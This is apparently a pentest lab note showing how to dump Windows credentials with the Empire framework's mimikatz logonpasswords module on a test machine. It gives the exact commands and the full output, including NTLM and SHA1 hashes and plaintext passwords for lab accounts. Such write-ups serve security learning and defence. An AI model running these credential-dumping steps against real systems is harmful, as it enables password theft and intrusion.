Empire - Dumping Credentials with Mimikatz

+ Mimikatz is an amazing tool that can extracts password hashes or plaintext passwords in memory

+ While password is encrypted in memory, a copy of secret key is also accesible in memory, allowing for decryption

+ Require high priviledge to execute and use this module

+ use the module, check the option and execute

	# (Empire) > interact Baseline
	# (Empire: Baseline) > usemodule credentials/mimikatz/logonpasswords*
	# (Empire: powershell/credentials/mimikatz/logonpasswords) > execute
	
		Job started: X24E5S

		Hostname: IEWIN7 / S-1-5-21-1610009768-122519599-941061767

		  .#####.   mimikatz 2.1 (x64) built on Dec 11 2016 18:05:17
		 .## ^ ##.  "A La Vie, A L'Amour"
		 ## / \ ##  /* * *
		 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
		 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
		  '#####'                                     with 20 modules * * */

		mimikatz(powershell) # sekurlsa::logonpasswords

		Authentication Id : 0 ; 106673 (00000000:0001a0b1)
		Session           : Service from 0
		User Name         : sshd_server
		Domain            : IEWIN7
		Logon Server      : IEWIN7
		Logon Time        : 9/21/2019 10:40:32 PM
		SID               : S-1-5-21-1610009768-122519599-941061767-1002
			msv :	
			 [00010000] CredentialKeys
			 * NTLM     : 8d0a16cfc061c3359db455d00ec27035
			 * SHA1     : 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
			 [00000003] Primary
			 * Username : sshd_server
			 * Domain   : IEWIN7
			 * NTLM     : 8d0a16cfc061c3359db455d00ec27035
			 * SHA1     : 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
			tspkg :	
			wdigest :	
			 * Username : sshd_server
			 * Domain   : IEWIN7
			 * Password : D@rj33l1ng
			kerberos :	
			 * Username : sshd_server
			 * Domain   : IEWIN7
			 * Password : (null)
			ssp :	
			credman :	

		Authentication Id : 0 ; 78870 (00000000:00013416)
		Session           : Interactive from 1
		User Name         : IEUser
		Domain            : IEWIN7
		Logon Server      : IEWIN7
		Logon Time        : 9/21/2019 10:40:31 PM
		SID               : S-1-5-21-1610009768-122519599-941061767-1000
			msv :	
			 [00010000] CredentialKeys
			 * NTLM     : fc525c9683e8fe067095ba2ddc971889
			 * SHA1     : e53d7244aa8727f5789b01d8959141960aad5d22
			 [00000003] Primary
			 * Username : IEUser
			 * Domain   : IEWIN7
			 * NTLM     : fc525c9683e8fe067095ba2ddc971889
			 * SHA1     : e53d7244aa8727f5789b01d8959141960aad5d22
			tspkg :	
			wdigest :	
			 * Username : IEUser
			 * Domain   : IEWIN7
			 * Password : Passw0rd!
			kerberos :	
			 * Username : IEUser
			 * Domain   : IEWIN7
			 * Password : (null)
			ssp :	
			credman :	

		Authentication Id : 0 ; 997 (00000000:000003e5)
		Session           : Service from 0
		User Name         : LOCAL SERVICE
		Domain            : NT AUTHORITY
		Logon Server      : (null)
		Logon Time        : 9/21/2019 10:40:31 PM
		SID               : S-1-5-19
			msv :	
			tspkg :	
			wdigest :	
			 * Username : (null)
			 * Domain   : (null)
			 * Password : (null)
			kerberos :	
			 * Username : (null)
			 * Domain   : (null)
			 * Password : (null)
			ssp :	
			credman :	

		Authentication Id : 0 ; 996 (00000000:000003e4)
		Session           : Service from 0
		User Name         : IEWIN7$
		Domain            : WORKGROUP
		Logon Server      : (null)
		Logon Time        : 9/21/2019 10:40:31 PM
		SID               : S-1-5-20
			msv :	
			tspkg :	
			wdigest :	
			 * Username : IEWIN7$
			 * Domain   : WORKGROUP
			 * Password : (null)
			kerberos :	
			 * Username : iewin7$
			 * Domain   : WORKGROUP
			 * Password : (null)
			ssp :	
			credman :	

		Authentication Id : 0 ; 44130 (00000000:0000ac62)
		Session           : UndefinedLogonType from 0
		User Name         : (null)
		Domain            : (null)
		Logon Server      : (null)
		Logon Time        : 9/21/2019 10:40:31 PM
		SID               : 
			msv :	
			tspkg :	
			wdigest :	
			kerberos :	
			ssp :	
			credman :	

		Authentication Id : 0 ; 999 (00000000:000003e7)
		Session           : UndefinedLogonType from 0
		User Name         : IEWIN7$
		Domain            : WORKGROUP
		Logon Server      : (null)
		Logon Time        : 9/21/2019 10:40:31 PM
		SID               : S-1-5-18
			msv :	
			tspkg :	
			wdigest :	
			 * Username : IEWIN7$
			 * Domain   : WORKGROUP
			 * Password : (null)
			kerberos :	
			 * Username : iewin7$
			 * Domain   : WORKGROUP
			 * Password : (null)
			ssp :	
			credman :	

		mimikatz(powershell) # exit
		Bye!
